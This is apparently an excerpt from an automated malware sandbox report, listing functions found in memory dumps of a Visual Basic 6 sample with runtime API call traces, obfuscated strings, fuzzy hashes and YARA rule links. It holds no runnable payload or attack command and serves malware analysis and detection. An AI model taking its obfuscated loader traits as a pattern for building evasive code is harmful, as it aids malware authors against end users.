Instruction Fuzzy Hash: 5741DD3164838ACBDB788E65CD95FEE3BA5AF04300F54842DED4ADB600E7309E409F51

Uniqueness

Uniqueness Score: -1.00%

Function 003C2A5F, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99a74aa9e86562b90e0a0a1fcf23a3200374c1ae6261c0b2bb5722475beb7d59
Instruction ID: 2e040419764e4ae3eeead7d3e57bef125b2aa139529d948fa8e6a01a4f9f6e87
Opcode Fuzzy Hash: 99a74aa9e86562b90e0a0a1fcf23a3200374c1ae6261c0b2bb5722475beb7d59
Instruction Fuzzy Hash: CF41C87A548348CFDB315E208C05BEFBBB2AFA03A0F56081CDC8A97251EB744C94CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003C76DF, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dbec01c966da5afc28285766432ef7e5d1b654dc1c18e257786c4278a1b2e2a
Instruction ID: 5504bdd21e034d94f4f40ff24322aa0ed2b2fe8e50932e9fccb447803c51444c
Opcode Fuzzy Hash: 8dbec01c966da5afc28285766432ef7e5d1b654dc1c18e257786c4278a1b2e2a
Instruction Fuzzy Hash: A941AC3164838B8FDB398E29CD94FEE3BA5AF04300F55842EDD4ADBA00E7309E409B51

Uniqueness

Uniqueness Score: -1.00%

Function 003C42D3, Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61f0b6f67b72787c020f49f1a19d13de8f2669b4900594506083d7ba1ebb0c7d
Instruction ID: f27f21b5e869c13aa4a3d6319ae0aa012f7d984b7a56f63940ef9fcf2793442e
Opcode Fuzzy Hash: 61f0b6f67b72787c020f49f1a19d13de8f2669b4900594506083d7ba1ebb0c7d
Instruction Fuzzy Hash: A22137352482979FD7239F68DD91BD5BBA5FF8A320F59422ED848CB202D7B05C54CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003C2A1C, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88fd39ba60c5663099c600eb878b61c16e289ad240b6604de1aaffcb4140b210
Instruction ID: bc0071ee570552676f52f369c56c4a04d5ddf624ca281e93d308a6eb256b9077
Opcode Fuzzy Hash: 88fd39ba60c5663099c600eb878b61c16e289ad240b6604de1aaffcb4140b210
Instruction Fuzzy Hash: 302151325483458FDB642E34CD06BEBBBB2AFA07E0F56080DCCC687250D3384C848B42

Uniqueness

Uniqueness Score: -1.00%

Function 003C6A6F, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567089dedc7b9716a9d1e63d9f91e6f6abd809318e8d110a4a98fcf59c6d92a7
Instruction ID: d3bdf9622baaeb61c3edb4cfc84d2012beb9633a1afd4c1fd9ebe6004b40944e
Opcode Fuzzy Hash: 567089dedc7b9716a9d1e63d9f91e6f6abd809318e8d110a4a98fcf59c6d92a7
Instruction Fuzzy Hash: EC215BB5608345DFDB748E3A8C91BEB7BF6BF55310F50852DAD9AC7254D73099408B02

Uniqueness

Uniqueness Score: -1.00%

Function 003C6A9F, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3661c3575f6af00838affae72f8f4c39f098e3e23b7d919ba2d9c02dd700fce
Instruction ID: ba5e75d18cc7e6c1e8e4995f713f047211594211e487af0e039bce2f33255848
Opcode Fuzzy Hash: d3661c3575f6af00838affae72f8f4c39f098e3e23b7d919ba2d9c02dd700fce
Instruction Fuzzy Hash: DB215B756083859FDB748E3A8C91BEB7BF6BF59310F40452DAD9AC7254D7308540CB11

Uniqueness

Uniqueness Score: -1.00%

Function 003C9CCF, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7cba1e99cbe29016df2e66166aaa29f2ef14fba05a032b9f51ae684aa3466c5
Instruction ID: 86a9705299e1dd91a3abaefc1e3f227aab176d44b1562e0e4b559961768b547d
Opcode Fuzzy Hash: a7cba1e99cbe29016df2e66166aaa29f2ef14fba05a032b9f51ae684aa3466c5
Instruction Fuzzy Hash: 9AF017382007028FCB25EE14D5DCF8A73A8EF6AB90F16885AD946EB614C324AC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 003C68D1, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2438cad83fd08cce00aeb45c478c18a463a9ff627710632a3757f72ecb57b07
Instruction ID: 6fe758d90ae6230d08a970756a48721c7306b4300cf02210061ff303cb13e9f4
Opcode Fuzzy Hash: f2438cad83fd08cce00aeb45c478c18a463a9ff627710632a3757f72ecb57b07
Instruction Fuzzy Hash: 28C08CB37004808FF752CB98C682B1077A5EB4A688B600098E223CB716D278FE40C6A4

Uniqueness

Uniqueness Score: -1.00%

Function 003C9321, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b9d0c4e0733fe7e31881dfa94d4fc8fcef40c5bf1b68e49b13f57088947ebcd
Instruction ID: 18c1f219af77d69b686df7759bd756180dc9cdeec61b83c3d132371db9cd98f1
Opcode Fuzzy Hash: 6b9d0c4e0733fe7e31881dfa94d4fc8fcef40c5bf1b68e49b13f57088947ebcd
Instruction Fuzzy Hash: E1B09234311A80CFCE9ACA0AC190F14B3B8BB44700B1244D5E002C7F61C328EC00CA00

Uniqueness

Uniqueness Score: -1.00%

Function 00420FF0, Relevance: 54.5, APIs: 30, Strings: 1, Instructions: 214COMMON

Download Yara Rule

APIs

#517.MSVBVM60(00403A08), ref: 0042104A
__vbaStrMove.MSVBVM60 ref: 00421055
__vbaStrCmp.MSVBVM60(00403994,00000000), ref: 00421061
__vbaFreeStr.MSVBVM60 ref: 00421074
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 00421091
__vbaLateMemCallLd.MSVBVM60(?,?,uQzYfoIri7ddvc3x8FN7bmsdWeJ3OQrppbhD233,00000000), ref: 004210AD
__vbaObjVar.MSVBVM60(00000000), ref: 004210B7
__vbaObjSetAddref.MSVBVM60(?,00000000), ref: 004210C2
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,0000000C), ref: 004210DC
__vbaFreeObj.MSVBVM60 ref: 004210E5
__vbaFreeVar.MSVBVM60 ref: 004210EE
__vbaVarDup.MSVBVM60 ref: 00421110
#562.MSVBVM60(?), ref: 0042111A
__vbaFreeVar.MSVBVM60 ref: 00421131
_adj_fdiv_m64.MSVBVM60 ref: 00421163
__vbaFpI4.MSVBVM60(42820000,?,434A0000), ref: 00421194
__vbaHresultCheckObj.MSVBVM60(00000000,?,004033B0,000002C0,?,434A0000), ref: 004211C8
#610.MSVBVM60(?), ref: 004211D8
#610.MSVBVM60(?), ref: 004211DE
__vbaVarAdd.MSVBVM60(?,00000009,?,00000001,00000001), ref: 00421206
#662.MSVBVM60(?,004038C4,?,00000000), ref: 0042121A
__vbaVarTstNe.MSVBVM60(?,?), ref: 0042123B
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00421256
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 00421276
__vbaObjVar.MSVBVM60(?), ref: 00421288
__vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00421293
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,00000010), ref: 004212AD
__vbaFreeObj.MSVBVM60 ref: 004212B6
__vbaFreeObj.MSVBVM60(00421309), ref: 004212F9
__vbaFreeVar.MSVBVM60 ref: 00421302

Strings

uQzYfoIri7ddvc3x8FN7bmsdWeJ3OQrppbhD233, xrefs: 004210A1

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#610AddrefNew2$#517#562#662CallLateListMove_adj_fdiv_m64
String ID: uQzYfoIri7ddvc3x8FN7bmsdWeJ3OQrppbhD233
API String ID: 3516706468-3714022841
Opcode ID: 0265971742b9b812ae83d87e345d26a61c91764e62c24ca1e1e5206881aa517c
Instruction ID: b1e4a98c6b326f0893f82495cd61aed876ab9f0f79a4e4bef3241ef4588b672b
Opcode Fuzzy Hash: 0265971742b9b812ae83d87e345d26a61c91764e62c24ca1e1e5206881aa517c
Instruction Fuzzy Hash: 3F815F71D00219EBDB149FA4EE48EEEBB78FB18701F50816AF646B21A0CB745945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0041BB10, Relevance: 50.9, APIs: 27, Strings: 2, Instructions: 177COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041BB5C
#670.MSVBVM60(?), ref: 0041BB66
__vbaVarTstEq.MSVBVM60(?,?), ref: 0041BB82
__vbaFreeVar.MSVBVM60 ref: 0041BB8E
__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041BBB0
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041BBC9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403A18,000001B8), ref: 0041BBF0
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000,00000000), ref: 0041BC01
__vbaStrVarMove.MSVBVM60(00000000), ref: 0041BC0B
__vbaStrMove.MSVBVM60 ref: 0041BC16
#716.MSVBVM60(?,00000000), ref: 0041BC21
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 0041BC48
__vbaFreeStr.MSVBVM60 ref: 0041BC51
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041BC61
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041BC71
__vbaI4Str.MSVBVM60(00403988), ref: 0041BC7F
#697.MSVBVM60(00000000), ref: 0041BC86
__vbaStrMove.MSVBVM60 ref: 0041BC91
__vbaStrCmp.MSVBVM60(00403994,00000000), ref: 0041BC9D
__vbaFreeStr.MSVBVM60 ref: 0041BCB0
#570.MSVBVM60(000000B9), ref: 0041BCC0
__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041BCD9
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041BCF2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403D34,00000068), ref: 0041BD13
__vbaFreeObj.MSVBVM60 ref: 0041BD22
__vbaFreeStr.MSVBVM60(0041BD70), ref: 0041BD60
__vbaFreeObj.MSVBVM60 ref: 0041BD69

Strings

~V, xrefs: 0041BB9D, 0041BBA6, 0041BBB6, 0041BCC6, 0041BCCF, 0041BCDF
Spheniscomorphae1, xrefs: 0041BB74

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresultLateListNew2$#570#670#697#716CallCopy
String ID: ~V$Spheniscomorphae1
API String ID: 1019445086-1047748348
Opcode ID: 2ac47d34c8a531131c98dee220dd5a130f1987571e14a5ec68b55a1ae2803ae0
Instruction ID: 9b5e8f7010bd0a3ba230ffb29a4b8f83bf912ee26e65a1d0f2f7898da77b82e6
Opcode Fuzzy Hash: 2ac47d34c8a531131c98dee220dd5a130f1987571e14a5ec68b55a1ae2803ae0
Instruction Fuzzy Hash: 77612D74900209AFCB14DFA4DE49DEEBBB9FF58701B10852AF502B72A0DB745945CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041AFF0, Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 250COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041B06A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041B083
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403A44,0000020C), ref: 0041B0A6
__vbaFreeObj.MSVBVM60 ref: 0041B0AF
__vbaVarDup.MSVBVM60 ref: 0041B0D8
#553.MSVBVM60(?,?), ref: 0041B0E2
__vbaVarTstNe.MSVBVM60(?,?), ref: 0041B107
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041B120
__vbaVarDup.MSVBVM60 ref: 0041B182
#596.MSVBVM60(?,?,?,?,?,?,?), ref: 0041B1A6
__vbaStrMove.MSVBVM60 ref: 0041B1B1
__vbaFreeVarList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 0041B1DB
__vbaLenBstr.MSVBVM60(00403EE8), ref: 0041B1E5
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 0041B207
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,0000001C), ref: 0041B22C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E48,00000054,?,?,?,?), ref: 0041B282
__vbaLateIdSt.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?), ref: 0041B2B9
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0041B2C2
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0041B2CB
__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041B2E4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041B2FD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403930,00000060), ref: 0041B321
__vbaFreeObj.MSVBVM60 ref: 0041B333
__vbaFreeObj.MSVBVM60(0041B391), ref: 0041B381
__vbaFreeStr.MSVBVM60 ref: 0041B38A

Strings

~V, xrefs: 0041B01C, 0041B060, 0041B070, 0041B2D1, 0041B2DA, 0041B2EA
Catecholamines, xrefs: 0041B16E
01/01/01, xrefs: 0041B0C4

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$List$#553#596BstrLateMove
String ID: ~V$01/01/01$Catecholamines
API String ID: 2020296758-204574015
Opcode ID: fa60c4f50bd573b26e1a014c0050b4ac6b2ccb2dbc5e4d611e059d9d0dce5710
Instruction ID: 40aac326d15b72be1bb5cedaa3f80bd3ac1e84a7b8a3ea019cd04138fb00a925
Opcode Fuzzy Hash: fa60c4f50bd573b26e1a014c0050b4ac6b2ccb2dbc5e4d611e059d9d0dce5710
Instruction Fuzzy Hash: D8B15AB1900208AFCB14CFA5DE48BDEBBB8FF48700F10816AE549B72A0D7745A45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00420B10, Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 250COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00402538, ~V), ref: 00420B7B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420B9A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403930,000001FC), ref: 00420BD9
__vbaFreeObj.MSVBVM60 ref: 00420BE8
#674.MSVBVM60(00000000,3FF00000,00000000,3FF00000,00000000,3FF00000,00000000,3FF00000,?,?), ref: 00420C24
__vbaFpR8.MSVBVM60 ref: 00420C2A
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00420C50
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 00420C77
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,0000004C), ref: 00420C9C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403F8C,0000001C,?,?,?,?), ref: 00420CE0
__vbaObjSet.MSVBVM60(?,?,?,?,?,?), ref: 00420CFB
__vbaFreeObj.MSVBVM60(?,?,?,?), ref: 00420D06
#519.MSVBVM60( rr), ref: 00420D0D
__vbaStrMove.MSVBVM60 ref: 00420D18
__vbaStrCmp.MSVBVM60(0040403C,00000000), ref: 00420D24
__vbaFreeStr.MSVBVM60 ref: 00420D37
__vbaNew2.MSVBVM60(00402538, ~V), ref: 00420D59
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420D72
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403930,000001C0), ref: 00420D95
__vbaLateMemCall.MSVBVM60(?,O6LxHL51aTnkYsQDbH68,00000002), ref: 00420DF1
__vbaFreeObj.MSVBVM60 ref: 00420DFD
__vbaFreeVar.MSVBVM60 ref: 00420E02
__vbaFreeObj.MSVBVM60(00420E5C), ref: 00420E54
__vbaFreeObj.MSVBVM60 ref: 00420E59

Strings

rr, xrefs: 00420D08
~V, xrefs: 00420B4A, 00420B71, 00420B81, 00420D46, 00420D4F, 00420D5F
O6LxHL51aTnkYsQDbH68, xrefs: 00420DCD

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$#519#674CallLateListMove
String ID: rr$ ~V$O6LxHL51aTnkYsQDbH68
API String ID: 13828861-784394790
Opcode ID: 1b38ae19d75472d13e5f3342027d411ed6ccaacb946e193ce315aef659dcf5ee
Instruction ID: 257f7a41940d3495f599f54ffa96cb27963003f62e4059f44de18fdc2da59bb5
Opcode Fuzzy Hash: 1b38ae19d75472d13e5f3342027d411ed6ccaacb946e193ce315aef659dcf5ee
Instruction Fuzzy Hash: 9DA12FB1A00214ABDB14DFA8DD85B9EBBF8FF49700F10816AF905B73A5D7749805CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041BD90, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

__vbaAryConstruct2.MSVBVM60(?,00403A2C,00000008), ref: 0041BDED
__vbaVarDup.MSVBVM60 ref: 0041BE07
#544.MSVBVM60(?,?), ref: 0041BE15
__vbaVarTstNe.MSVBVM60(?,?), ref: 0041BE3A
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041BE4D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004033B0,000002B0), ref: 0041BECA
__vbaStrCopy.MSVBVM60 ref: 0041BEDE
__vbaStrCopy.MSVBVM60 ref: 0041BEEB
__vbaVarDup.MSVBVM60 ref: 0041BF06
#710.MSVBVM60(00000008,?), ref: 0041BF2D
__vbaStrMove.MSVBVM60 ref: 0041BF38
__vbaStrCmp.MSVBVM60(00403A10,00000000), ref: 0041BF44
__vbaFreeStr.MSVBVM60 ref: 0041BF57
__vbaFreeVar.MSVBVM60 ref: 0041BF60
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 0041BF81
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,0000001C), ref: 0041BFA6
__vbaCastObj.MSVBVM60(?,00403964), ref: 0041BFDB
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041BFE6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E48,00000058), ref: 0041C000
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041C010

Strings

20:20:20, xrefs: 0041BDF9

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$CopyList$#544#710CastConstruct2MoveNew2
String ID: 20:20:20
API String ID: 1246080522-1725373740
Opcode ID: 767995dfe7fc8b9f225c04cc86634aabf66ac4d87b9d961deb8ab57626f23349
Instruction ID: cd5d7455f274fd969b305e4ea03c0a6a338486a7e267371eae6951bd723cdc28
Opcode Fuzzy Hash: 767995dfe7fc8b9f225c04cc86634aabf66ac4d87b9d961deb8ab57626f23349
Instruction Fuzzy Hash: 5E8156B0D00209EFDB14DFA8C989ADEBBB8FF48700F10816AE549B72A1D7745945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041FCA0, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

__vbaHresultCheckObj.MSVBVM60(00000000,?,004033B0,000000A8), ref: 0041FD08
__vbaStrCmp.MSVBVM60(00000000,?), ref: 0041FD13
__vbaFreeStr.MSVBVM60 ref: 0041FD25
__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041FD4D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FD70
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403A18,00000198), ref: 0041FD93
__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041FDAC
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FDC1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403A54,00000048), ref: 0041FDDE
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 0041FDF7
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,0000004C), ref: 0041FE18
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403F8C,00000024), ref: 0041FE44
__vbaStrMove.MSVBVM60 ref: 0041FE57
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041FE67
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041FE7B
__vbaOnError.MSVBVM60(00000000), ref: 0041FE94
__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041FEAD
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FEC2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403998,000001A8), ref: 0041FEE1
__vbaFreeObj.MSVBVM60 ref: 0041FEEA
__vbaFreeStr.MSVBVM60(0041FF2D), ref: 0041FF26

Strings

~V, xrefs: 0041FD34, 0041FD3D, 0041FD4F, 0041FD99, 0041FDA2, 0041FDAE, 0041FE9A, 0041FEA3, 0041FEAF

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$New2$List$ErrorMove
String ID: ~V
API String ID: 2931715464-4105715531
Opcode ID: 2c08c767f456c8a4a4c79318e4eb178d1547ed1a3774c7c0e36532c7ca2f4aa9
Instruction ID: ec151b8cb17f23dde6b9af846ab5b2a9cc21f680057af3cc83a836b88ffd1411
Opcode Fuzzy Hash: 2c08c767f456c8a4a4c79318e4eb178d1547ed1a3774c7c0e36532c7ca2f4aa9
Instruction Fuzzy Hash: D2718F71A00214ABDB10DFA5DD48EEAB7BCFF49700F10442AF946F72A0D7B49905CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00420010, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00420089
__vbaStrCopy.MSVBVM60 ref: 00420091
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 004200A5
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,00000014), ref: 004200D0
__vbaHresultCheckObj.MSVBVM60(00000000,?,004038F8,000000F0), ref: 004200FE
__vbaStrMove.MSVBVM60 ref: 00420109
__vbaFreeObj.MSVBVM60 ref: 00420112
#693.MSVBVM60(00403994), ref: 0042011D
#532.MSVBVM60(DEDD), ref: 0042012C
#660.MSVBVM60(?,?,?,00000001,00000001), ref: 0042015F
__vbaVarTstNe.MSVBVM60(?,?), ref: 00420180
__vbaFreeVarList.MSVBVM60(00000003,00000002,0000000A,?), ref: 00420197
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 004201BB
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,0000004C), ref: 004201E0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403F8C,0000001C,?,?,?,?), ref: 0042022D
__vbaObjSet.MSVBVM60(?,?,?,?,?,?), ref: 0042023E
__vbaFreeObj.MSVBVM60(?,?,?,?), ref: 00420247
__vbaFreeStr.MSVBVM60(004202B7), ref: 004202A1
__vbaFreeObj.MSVBVM60 ref: 004202A6
__vbaFreeStr.MSVBVM60 ref: 004202AF
__vbaFreeStr.MSVBVM60 ref: 004202B4

Strings

DEDD, xrefs: 00420127

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$CopyNew2$#532#660#693ListMove
String ID: DEDD
API String ID: 303901731-2798080213
Opcode ID: f64a82e656d701049c55be138da368291e98e56cb130f6e964b121acc5dda068
Instruction ID: 6139f0d168f3508e347f1088a4fb11033b61709c2d1bed7e2d022a60db6cf542
Opcode Fuzzy Hash: f64a82e656d701049c55be138da368291e98e56cb130f6e964b121acc5dda068
Instruction Fuzzy Hash: 69712B71A00219EFDB10DF94D985ADEBBB9FF48B00F20816AF505B72A1C7745945CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041C090, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041C0F1
__vbaVarDup.MSVBVM60 ref: 0041C10B
#564.MSVBVM60(?,?), ref: 0041C119
__vbaHresultCheck.MSVBVM60(00000000), ref: 0041C124
__vbaVarTstNe.MSVBVM60(?,?), ref: 0041C140
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041C153
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 0041C173
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,00000048), ref: 0041C19A
__vbaStrMove.MSVBVM60 ref: 0041C1A9
#554.MSVBVM60 ref: 0041C1AF
__vbaR4Str.MSVBVM60(004039D4), ref: 0041C1BA
__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041C1E4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041C1FD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403930,00000130), ref: 0041C224
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041C236
__vbaI4Var.MSVBVM60(00000000), ref: 0041C240
__vbaHresultCheckObj.MSVBVM60(00000000,00401460,004033B0,00000084), ref: 0041C297
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041C2A7
__vbaFreeVar.MSVBVM60 ref: 0041C2B3
__vbaFreeStr.MSVBVM60(0041C30A), ref: 0041C302
__vbaFreeStr.MSVBVM60 ref: 0041C307

Strings

~V, xrefs: 0041C1D1, 0041C1DA, 0041C1EA

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
